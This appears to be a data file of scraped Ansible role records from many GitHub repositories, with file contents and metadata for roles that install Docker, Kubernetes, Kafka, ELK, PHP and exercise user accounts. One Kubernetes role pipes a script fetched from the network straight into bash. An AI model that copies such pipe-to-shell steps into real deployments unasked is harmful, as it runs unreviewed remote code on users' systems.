[ { "path": "roles/linux_deploy_ssh_public_keys/tasks/main.yaml", "content": "---\n- name: Deploy SSH Public Keys\n ansible.posix.authorized_key:\n user: \"{{ item }}\"\n key: \"{{ authorized_ssh_key }}\"\n state: present\n loop: \"{{ authorized_users }}\"", "license_type": "no_license", "d...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 177, "all_permissive": false }
ansible_role
icefisher225/CDT-ansible
39db658e53fbade93da6b2ca904eac9f1b2e4cc0
1
roles/linux_deploy_user
7,239
[ "no_license" ]
[ { "path": "roles/linux_deploy_user/tasks/main.yaml", "content": "---\n\n- name: create groups\n group:\n name: \"{{ item }}\"\n state: present\n with_items: \"{{ user_groups }}\"\n\n- name: deploy whiteteam, blueteam, redteam users\n user:\n append: yes\n groups: \"{{ (user_groups | join(',')...
{ "task_files": 1, "has_defaults": true, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 1115, "all_permissive": false }
ansible_role
icefisher225/CDT-ansible
39db658e53fbade93da6b2ca904eac9f1b2e4cc0
1
roles/windows_deploy_command
7,239
[ "no_license" ]
[ { "path": "roles/windows_deploy_command/defaults/main.yaml", "content": "---\n\ncommand: \"ping -c 1 google.com\"\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 37 }, { "path": "roles/windows_deploy_command/tasks/main.yaml", "content": "---\n- name: Deploy P...
{ "task_files": 1, "has_defaults": true, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 174, "all_permissive": false }
ansible_role
icefisher225/CDT-ansible
39db658e53fbade93da6b2ca904eac9f1b2e4cc0
1
roles/windows_deploy_ssh_config
7,239
[ "no_license" ]
[ { "path": "roles/windows_deploy_ssh_config/tasks/main.yaml", "content": "---\n\n- name: Install OpenSSH Server\n #This should never happen, but just in case\n win_feature:\n name: OpenSSH.Server\n state: present\n include_management_tools: true\n register: ssh_server_install\n\n- name: Autostart...
{ "task_files": 1, "has_defaults": true, "has_handlers": false, "has_templates": true }
{ "file_count": 3, "total_bytes": 1166, "all_permissive": false }
ansible_role
wikitops/ansible_tuleap
072003ed5bbe5ef7980fead322d6fc1dc83a91f6
0
roles/tuleap
7,239
[ "no_license" ]
[ { "path": "roles/tuleap/tasks/main.yml", "content": "---\n\n- name: TULEAP DOCKER | Create directories\n file:\n path: \"{{ tuleap_data_dir }}\"\n state: directory\n owner: root\n group: root\n mode: 0755\n\n- name: TULEAP DOCKER | Create the network\n docker_network:\n name: \"{{ tuleap...
{ "task_files": 1, "has_defaults": true, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 1331, "all_permissive": false }
ansible_role
aristanetworks/ci-workshops-fundamentals
bc6c2232eef0502e8f6bc83d355311652851aa36
8
ansible/roles/mlag
7,239
[ "no_license" ]
[ { "path": "ansible/roles/mlag/tasks/main.yml", "content": "---\n\n- name: Create required output directory if not already present\n tags: ['always', 'build']\n ansible.builtin.file:\n path: ../configs/mlag\n state: directory\n mode: 0775\n delegate_to: localhost\n run_once: true\n\n- name: Gene...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": true }
{ "file_count": 2, "total_bytes": 2067, "all_permissive": false }
ansible_role
MDDAIEXPOSER/labaiorio_3
148871b0f7319862135f78b69ff659d89ef1e91c
0
roles/selina
7,239
[ "no_license" ]
[ { "path": "roles/selina/tests/test.yml", "content": "---\n- hosts: localhost\n remote_user: root\n roles:\n - selina\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 65 }, { "path": "roles/selina/vars/main.yml", "content": "---\n# vars file for selina\n",...
{ "task_files": 1, "has_defaults": true, "has_handlers": true, "has_templates": false }
{ "file_count": 5, "total_bytes": 412, "all_permissive": false }
ansible_role
zohirul97/ansible_tutorial
ce0e951c4a0f37044c80cb3be5a59d6a40d87d8c
0
roles/db_servers
7,239
[ "no_license" ]
[ { "path": "roles/db_servers/tasks/main.yml", "content": "- name: install mariadb package (CentOS)\n tags: centos,db,mariadb\n yum:\n name: mariadb\n state: latest\n when: ansible_distribution == \"CentOS\"\n\n- name: installe mariadb package (Ubuntu)\n tags: ubuntu,db,mariadb\n apt:\n name: ma...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 312, "all_permissive": false }
ansible_role
jschoone/openstack-ansible
cee2e27162ef2139ce42009dee642fc1a953f986
1
roles/terraform
7,239
[ "no_license" ]
[ { "path": "roles/terraform/defaults/main.yaml", "content": "---\nterraform_version: 0.15.3\nterraform_url: https://releases.hashicorp.com/terraform/{{ terraform_version }}/terraform_{{ terraform_version }}_linux_{{ arch }}.zip\n\nterraform_dir: /opt/terraform\nterraform_user: \"{{ ansible_user }}\"\nterrafo...
{ "task_files": 1, "has_defaults": true, "has_handlers": false, "has_templates": true }
{ "file_count": 7, "total_bytes": 8978, "all_permissive": false }
ansible_role
fd98279/training
d8a2ae711f270a4cfe80f64b16f923821120bbc5
0
Ansible/roles/kafka
7,239
[ "no_license" ]
[ { "path": "Ansible/roles/kafka/handlers/main.yml", "content": "---\n\n- name: reload systemd\n become: yes\n systemd:\n daemon_reload: yes\n\n- name: restart kafka services\n become: yes\n service:\n name: \"kafka_broker_{{item}}@{{item}}.service\"\n state: \"{{systemd_service_action}}\"\n e...
{ "task_files": 3, "has_defaults": true, "has_handlers": true, "has_templates": true }
{ "file_count": 7, "total_bytes": 7276, "all_permissive": false }
ansible_role
fd98279/training
d8a2ae711f270a4cfe80f64b16f923821120bbc5
0
Ansible/roles/sravz.node
7,239
[ "no_license" ]
[ { "path": "Ansible/roles/sravz.node/tasks/setup_base_ubuntu.yml", "content": "---\n - name: Update apt\n become: yes\n apt:\n cache_valid_time: 1800\n update_cache: yes\n tags:\n - build\n - setup\n - basic\n - apt\n - apt-update\n\n - name: Sync ntp\n includ...
{ "task_files": 11, "has_defaults": true, "has_handlers": true, "has_templates": true }
{ "file_count": 16, "total_bytes": 14695, "all_permissive": false }
ansible_role
fd98279/training
d8a2ae711f270a4cfe80f64b16f923821120bbc5
0
Ansible/roles/zookeeper
7,239
[ "no_license" ]
[ { "path": "Ansible/roles/zookeeper/tasks/main.yml", "content": "---\n\n- name: Install Zookeeper\n include: build.yml\n tags:\n - build\n\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 73 }, { "path": "Ansible/roles/zookeeper/tasks/build.yml", "content"...
{ "task_files": 2, "has_defaults": false, "has_handlers": true, "has_templates": false }
{ "file_count": 3, "total_bytes": 1181, "all_permissive": false }
ansible_role
telecomprofi/aws
77112051d04d3489365ccb994d9e198cd81d7c4e
0
elk/roles/elasticsearch
7,247
[ "no_license" ]
[ { "path": "elk/roles/elasticsearch/defaults/main.yml", "content": "es_jvm_options_file: /etc/elasticsearch/jvm.options\nes_xmx: -Xmx\nes_xms: -Xms\nes_xmx_memory: 500m\nes_xms_memory: 500m", "license_type": "no_license", "detected_licenses": [], "size_bytes": 117 }, { "path": "elk/roles/...
{ "task_files": 1, "has_defaults": true, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 1416, "all_permissive": false }
ansible_role
telecomprofi/aws
77112051d04d3489365ccb994d9e198cd81d7c4e
0
elk/roles/java
7,247
[ "no_license" ]
[ { "path": "elk/roles/java/tasks/main.yml", "content": "---\n#\n# Installing Java 8\n#\n\n- name: Check if java8 is installed\n command: dpkg -l oracle-java8-installer\n register: deb_check\n ignore_errors: yes\n\n- name: Add the Java repo\n apt_repository:\n repo: ppa:webupd8team/java\n failed_when: ...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 841, "all_permissive": false }
ansible_role
telecomprofi/aws
77112051d04d3489365ccb994d9e198cd81d7c4e
0
elk/roles/kibana
7,247
[ "no_license" ]
[ { "path": "elk/roles/kibana/tasks/main.yml", "content": "---\n#\n# Installing Kibana\n#\n# Add apt key\n\n- name: Add apt key\n apt_key:\n url: \"{{ url }}\"\n state: present\n\n# Add the apt repo\n\n- name: Adding repo\n apt_repository:\n repo: \"{{ repo }}\"\n state: present\n\n- name: Install K...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 877, "all_permissive": false }
ansible_role
telecomprofi/aws
77112051d04d3489365ccb994d9e198cd81d7c4e
0
elk/roles/logstash
7,247
[ "no_license" ]
[ { "path": "elk/roles/logstash/templates/filter.conf.j2", "content": "filter {\n date {\n type => \"testoleh\"\n match => [ \"timestamp\", \"MMM dd HH:mm:ss\" ]\n }\n}", "license_type": "no_license", "detected_licenses": [], "size_bytes": 94 }, { "path": "elk/roles/logstash/tasks/...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": true }
{ "file_count": 4, "total_bytes": 1361, "all_permissive": false }
ansible_role
thetwoj/packer_amis
1ff7f76550b19cabf7d8724e4a1cd45c3e5979e7
0
roles/apache
7,247
[ "no_license" ]
[ { "path": "roles/apache/tasks/main.yml", "content": "- name: Install HTTP Packages\n yum: name=httpd update_cache=yes state=latest\n \n- name: Enable httpd service\n service: name=httpd enabled=yes\n\n- name: Set up Apache VirtualHost\n template:\n src: \"files/httpd.conf\"\n dest: \"/etc/httpd/con...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 420, "all_permissive": false }
ansible_role
thetwoj/packer_amis
1ff7f76550b19cabf7d8724e4a1cd45c3e5979e7
0
roles/cloudwatch-agent
7,247
[ "no_license" ]
[ { "path": "roles/cloudwatch-agent/tasks/main.yml", "content": "- name: Enable php74 and epel repositories\n yum: name=amazon-cloudwatch-agent update_cache=yes state=latest\n\n- name: Set amazon-cloudwatch-agent config\n template:\n src: \"files/cloudwatch-agent-config.json\"\n dest: \"/opt/aws/amazo...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 590, "all_permissive": false }
ansible_role
thetwoj/packer_amis
1ff7f76550b19cabf7d8724e4a1cd45c3e5979e7
0
roles/jq
7,247
[ "no_license" ]
[ { "path": "roles/jq/tasks/main.yml", "content": "- name: Install jq\n yum: name=jq update_cache=yes state=latest\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 64 } ]
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 64, "all_permissive": false }
ansible_role
thetwoj/packer_amis
1ff7f76550b19cabf7d8724e4a1cd45c3e5979e7
0
roles/mariadb
7,247
[ "no_license" ]
[ { "path": "roles/mariadb/tasks/main.yml", "content": "- name: Disable mariadb 10.2\n shell: amazon-linux-extras disable lamp-mariadb10.2-php7.2\n\n- name: Enable mariadb 10.5\n shell: amazon-linux-extras enable mariadb10.5\n\n- name: Install mariadb-server\n yum: name=mariadb-server update_cache=yes stat...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 913, "all_permissive": false }
ansible_role
thetwoj/packer_amis
1ff7f76550b19cabf7d8724e4a1cd45c3e5979e7
0
roles/php
7,247
[ "no_license" ]
[ { "path": "roles/php/tasks/main.yml", "content": "- name: Disable PHP 7.2\n shell: amazon-linux-extras disable php7.2\n\n- name: Enable PHP 8.0\n shell: amazon-linux-extras enable php8.0\n\n- name: Clean yum metadata\n shell: yum clean metadata\n\n- name: Install PHP 8.0\n shell: amazon-linux-extras ins...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 585, "all_permissive": false }
ansible_role
being-jananee/lowCode
774abc524801f24eb52c53d3d1134379ba65ffec
0
deploy/ansible/appsmith_playbook/roles/setup-appsmith
7,247
[ "no_license" ]
[ { "path": "deploy/ansible/appsmith_playbook/roles/setup-appsmith/templates/init-ssh.sh", "content": "#!/bin/bash\n\nauthorized_keys_path=/home/bizBrainz/.ssh/authorized_keys\nif [[ ! -e \"$authorized_keys_path\" ]]; then\n\t\techo \"Setting SSH key\"\n\t\tsudo cp ~/.ssh/authorized_keys \"$authorized_keys_pa...
{ "task_files": 3, "has_defaults": false, "has_handlers": true, "has_templates": true }
{ "file_count": 7, "total_bytes": 4677, "all_permissive": false }
ansible_role
artcz/epsetup
3d5e05517557497eef1e0a3706e38821c19e4378
0
ansible/roles/basic_role
7,247
[ "no_license" ]
[ { "path": "ansible/roles/basic_role/tasks/main.yml", "content": "---\n\n- name: append timestamp to ~/timestamps file\n shell: date >> ~/timestamps\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 81 } ]
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 81, "all_permissive": false }
ansible_role
artcz/epsetup
3d5e05517557497eef1e0a3706e38821c19e4378
0
ansible/roles/docker_compose
7,247
[ "no_license" ]
[ { "path": "ansible/roles/docker_compose/tasks/main.yml", "content": "---\n\n- name: Set up docker-compose\n template:\n src: docker-compose.yaml.j2\n dest: \"{{ deploy_path }}/docker-compose.yaml\"\n owner: ubuntu\n group: ubuntu\n mode: 0644\n", "license_type": "no_license", ...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": true }
{ "file_count": 3, "total_bytes": 6120, "all_permissive": false }
ansible_role
artcz/epsetup
3d5e05517557497eef1e0a3706e38821c19e4378
0
ansible/roles/install_packages
7,247
[ "no_license" ]
[ { "path": "ansible/roles/install_packages/tasks/main.yml", "content": "---\n\n- name: Install required packages\n become: yes\n become_method: sudo\n apt:\n update_cache: yes\n name: \"{{ packages }}\"\n vars:\n packages:\n - python3\n - nginx\n - docker\n ...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 243, "all_permissive": false }
ansible_role
tulte/aws-ansible
6cdc7800d10c2bd4b1f425c4965a931f0b22b6f4
0
roles/ec2
7,247
[ "no_license" ]
[ { "path": "roles/ec2/defaults/main.yml", "content": "ec2:\n project_name: test\n access_key: \n secret_key: \n region: eu-central-1\n instance_type: t2.nano\n ami: ami-c7e0c82c\n vpc_subnet_id: subnet-8b6039e0\n ssh_key: to<PASSWORD>\n server_count: 1\n server_tag: server\n hostpath: ./hosts\n s...
{ "task_files": 1, "has_defaults": true, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 1875, "all_permissive": false }
ansible_role
tulte/aws-ansible
6cdc7800d10c2bd4b1f425c4965a931f0b22b6f4
0
roles/jupyter
7,247
[ "no_license" ]
[ { "path": "roles/jupyter/tasks/main.yml", "content": "- name: install jupyter\n pip:\n name: 'jupyter'\n\n- name: copy certs key\n template:\n src: certs/jupyter.key\n dest: '/home/{{ jupyter_user }}/certs/'\n owner: '{{ jupyter_user }}'\n group: '{{ jupyter_user }}'\n\n- name: copy certs p...
{ "task_files": 1, "has_defaults": true, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 1280, "all_permissive": false }
ansible_role
tulte/aws-ansible
6cdc7800d10c2bd4b1f425c4965a931f0b22b6f4
0
roles/python
7,247
[ "no_license" ]
[ { "path": "roles/python/tasks/main.yml", "content": "- include_tasks: python3.yml\n when: python.version3 == true\n\n- include_tasks: python2.yml\n when: python.version2 == true\n ", "license_type": "no_license", "detected_licenses": [], "size_bytes": 127 }, { "path": "roles/python/...
{ "task_files": 3, "has_defaults": true, "has_handlers": false, "has_templates": false }
{ "file_count": 4, "total_bytes": 953, "all_permissive": false }
ansible_role
tulte/aws-ansible
6cdc7800d10c2bd4b1f425c4965a931f0b22b6f4
0
roles/spark
7,247
[ "no_license" ]
[ { "path": "roles/spark/defaults/main.yml", "content": "spark:\n url: https://d3kbcqa49mib13.cloudfront.net/spark-2.2.0-bin-hadoop2.7.tgz\n file: spark-2.2.0-bin-hadoop2.7\n user: ubuntu\n group: ubuntu\n folder_tmp: /tmp\n folder_spark: /opt", "license_type": "no_license", "detected_licenses":...
{ "task_files": 1, "has_defaults": true, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 1062, "all_permissive": false }
ansible_role
elyesbenamor/Kubernetes-Helm-Automation
a195e58122635342bc7c1c273ed72cb54f0de72c
0
roles/clean
7,247
[ "no_license" ]
[ { "path": "roles/clean/tasks/main.yml", "content": "---\n\n- name: Remove an existing Service object\n kubernetes.core.k8s:\n state: absent\n api_version: v1\n kind: Deployment\n namespace: testing\n name: nginx-deployment\n", "license_type": "no_license", "detected_licenses": [], ...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 179, "all_permissive": false }
ansible_role
elyesbenamor/Kubernetes-Helm-Automation
a195e58122635342bc7c1c273ed72cb54f0de72c
0
roles/docker
7,247
[ "no_license" ]
[ { "path": "roles/docker/tasks/user.yml", "content": "---\n- name: Create \"docker\" group\n shell: groupadd {{ docker_group }}\n ignore_errors: yes\n\n# sudo usermod -aG docker root\n- name: Add remote \"ubuntu\" user to \"docker\" group\n shell: usermod -aG docker {{ remote_user }}\n ignore_errors: yes...
{ "task_files": 2, "has_defaults": true, "has_handlers": false, "has_templates": false }
{ "file_count": 3, "total_bytes": 1411, "all_permissive": false }
ansible_role
elyesbenamor/Kubernetes-Helm-Automation
a195e58122635342bc7c1c273ed72cb54f0de72c
0
roles/k8s
7,247
[ "no_license" ]
[ { "path": "roles/k8s/tasks/deploy-nginx.yml", "content": "---\n- name: Create a Deployment\n kubernetes.core.k8s:\n state: present\n definition: \"{{ lookup('template', 'nginx.yaml') | from_yaml }}\"\n namespace: \"{{get_name.result.metadata.name}}\"\n", "license_type": "no_license", "dete...
{ "task_files": 3, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 3, "total_bytes": 588, "all_permissive": false }
ansible_role
elyesbenamor/Kubernetes-Helm-Automation
a195e58122635342bc7c1c273ed72cb54f0de72c
0
roles/k8s-setup
7,247
[ "no_license" ]
[ { "path": "roles/k8s-setup/tasks/master-setup.yml", "content": "---\n- name: Initialize Kubernetes master with kubeadm init.\n command: >\n kubeadm init\n --pod-network-cidr={{ kubernetes_pod_network.cidr }}\n --apiserver-advertise-address={{ kubernetes_apiserver_advertise_address | default(ansibl...
{ "task_files": 2, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 2, "total_bytes": 4563, "all_permissive": false }
ansible_role
elyesbenamor/Kubernetes-Helm-Automation
a195e58122635342bc7c1c273ed72cb54f0de72c
0
roles/system-setup
7,247
[ "no_license" ]
[ { "path": "roles/system-setup/tasks/main.yml", "content": "---\n- block:\n - name: update apt cache\n apt:\n update_cache: yes\n\n - name: Upgrade the OS (apt-get dist-upgrade)\n apt:\n upgrade: dist\n\n - name: install system packages\n apt:\n name: \"{{ item }}\"\n state: l...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 423, "all_permissive": false }
ansible_role
hemachandrareddy/Class_Setup
9f7d93a0f07477bd32a9ab56df453aaee9bd0472
0
playbook/roles/apache2
7,247
[ "no_license" ]
[ { "path": "playbook/roles/apache2/tasks/main.yml", "content": " - name: Maven\n become: yes\n apt: name=apache2 state=present update_cache=yes\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 82 } ]
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 82, "all_permissive": false }
ansible_role
hemachandrareddy/Class_Setup
9f7d93a0f07477bd32a9ab56df453aaee9bd0472
0
playbook/roles/git
7,247
[ "no_license" ]
[ { "path": "playbook/roles/git/tasks/main.yml", "content": " - name: git\n become: yes\n apt: name=git state=latest update_cache=yes\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 75 } ]
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 75, "all_permissive": false }
ansible_role
hemachandrareddy/Class_Setup
9f7d93a0f07477bd32a9ab56df453aaee9bd0472
0
playbook/roles/javahome
7,247
[ "no_license" ]
[ { "path": "playbook/roles/javahome/tasks/main.yml", "content": "- name: set JAVA_HOME environment variable\n lineinfile: path=/home/ubuntu/.profile line='export JAVA_HOME=/usr/lib/jvm/java-8-oracle' insertafter=EOF\n\n- name: set JAVA PATH environment variable\n lineinfile: path=/home/ubuntu/.profile line...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 288, "all_permissive": false }
ansible_role
hemachandrareddy/Class_Setup
9f7d93a0f07477bd32a9ab56df453aaee9bd0472
0
playbook/roles/maven
7,247
[ "no_license" ]
[ { "path": "playbook/roles/maven/tasks/main.yml", "content": " - name: maven\n become: yes\n apt: name=maven state=latest update_cache=yes\n", "license_type": "no_license", "detected_licenses": [], "size_bytes": 79 } ]
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 79, "all_permissive": false }
ansible_role
hemachandrareddy/Class_Setup
9f7d93a0f07477bd32a9ab56df453aaee9bd0472
0
playbook/roles/setup
7,247
[ "no_license" ]
[ { "path": "playbook/roles/setup/tasks/main.yml", "content": " - name: creating my own directory\n file:\n path: /home/ubuntu/reddy\n owner: ubuntu\n group: ubuntu\n state: directory\n\n - name: creating my own file\n file: \n path: /home/ubuntu/reddy/reddyk\n owner: ubuntu\n group: ...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 378, "all_permissive": false }
ansible_role
hemachandrareddy/Class_Setup
9f7d93a0f07477bd32a9ab56df453aaee9bd0472
0
playbook/roles/tomcat
7,247
[ "no_license" ]
[ { "path": "playbook/roles/tomcat/tasks/main.yml", "content": " - name: Tomcat8 Installation By using zip file\n get_url:\n url: http://www-eu.apache.org/dist/tomcat/tomcat-8/v8.5.11/bin/apache-tomcat-8.5.11.tar.gz\n dest: /home/ubuntu/tomcat\n \n\n - name: Un-Archive zip file\n unarchive: src=/h...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 557, "all_permissive": false }
ansible_role
bryanl/container-services-0003
4ea5a33218d879f8918b672d0ae27de36ede6e84
1
ansible/roles/common
7,247
[ "no_license" ]
[ { "path": "ansible/roles/common/templates/initial_cluster.j2", "content": "{% macro initial_cluster() -%}\n{% for host in groups[etcd_peers_group] -%}\n {% if loop.last %}\n{{ hostvars[host]['name'] }}={{ etcd_peer_url_scheme }}://{{ hostvars[host]['ansible_' + etcd_peer_interface]['ipv4']['address'] }}:{{...
{ "task_files": 1, "has_defaults": true, "has_handlers": true, "has_templates": true }
{ "file_count": 5, "total_bytes": 4872, "all_permissive": false }
ansible_role
PassZhang/ansible-install-k8s
cdd422a4d7eabcda1b35d8e9e4908a3990d551a5
10
roles/addons
7,247
[ "no_license" ]
[ { "path": "roles/addons/tasks/main.yml", "content": "---\n- name: 允许Node加入集群\n ignore_errors: yes\n shell: kubectl certificate approve $(kubectl get csr |awk 'NR!=1{print $1}')\n\n- name: 拷贝YAML文件到Master\n copy: src={{ item }} dest={{ tmp_dir }}\n with_fileglob:\n - \"*.yaml\"\n\n- name: 部署Flannel,Da...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 1584, "all_permissive": false }
ansible_role
Vdgonc/playbook-k8s
6708986c281bb4672fee63dbfe7fe95e263ffc20
0
roles/init_cluster
7,247
[ "no_license" ]
[ { "path": "roles/init_cluster/tasks/main.yml", "content": "---\n- name: Init\n command: kubeadm init\n register: kubeinit\n\n- name: Criando diretory ./kube\n file:\n path: ~/.kube\n state: directory\n\n- name: Criando symlink admin.conf para .kube/config\n file:\n src: /etc/kubernetes/admin.co...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 832, "all_permissive": false }
ansible_role
Vdgonc/playbook-k8s
6708986c281bb4672fee63dbfe7fe95e263ffc20
0
roles/install_k8s
7,247
[ "no_license" ]
[ { "path": "roles/install_k8s/tasks/main.yml", "content": "\n---\n- name: Instalando Docker\n shell: curl -fsSL https://get.docker.com | bash -\n\n- name: Adicionando chave repo k8s\n apt_key:\n url: https://packages.cloud.google.com/apt/doc/apt-key.gpg\n state: present\n\n- name: Adicionando o repo ...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 480, "all_permissive": false }
ansible_role
Vdgonc/playbook-k8s
6708986c281bb4672fee63dbfe7fe95e263ffc20
0
roles/join_cluster
7,247
[ "no_license" ]
[ { "path": "roles/join_cluster/tasks/main.yml", "content": "---\n- name: kubeadm join\n shell: kubeadm join --token {{ hostvars['TOKEN_HOLDER']['token'] }} --discovery-token-ca-cert-hash sha256:{{ hostvars['TOKEN_HOLDER']['hash'] }} {{ MASTER_IP }}:{{ MASTER_SECURE_PORT }}", "license_type": "no_license"...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 212, "all_permissive": false }
ansible_role
DevOpsGodd/to-do-infra
2c576223d360d44de75b62f1e797306f8dd7216e
0
ansible/roles/dependencies
7,243
[ "no_license" ]
[ { "path": "ansible/roles/dependencies/tasks/main.yml", "content": "# ansible/roles/dependencies/tasks/main.yml\n\n---\n- name: Update and upgrade apt packages\n apt:\n update_cache: yes\n upgrade: yes\n\n- name: Install required packages\n apt:\n name:\n - apt-transport-https\n - ca-cer...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 1194, "all_permissive": false }
ansible_role
DevOpsGodd/to-do-infra
2c576223d360d44de75b62f1e797306f8dd7216e
0
ansible/roles/deployment
7,243
[ "no_license" ]
[ { "path": "ansible/roles/deployment/tasks/main.yml", "content": "# ansible/roles/deployment/tasks/main.yml\n\n---\n- name: Create app directory\n file:\n path: \"{{ app_dir }}\"\n state: directory\n mode: '0755'\n\n- name: Clone application repository\n git:\n repo: \"{{ repo_url }}\"\n des...
{ "task_files": 1, "has_defaults": false, "has_handlers": false, "has_templates": false }
{ "file_count": 1, "total_bytes": 998, "all_permissive": false }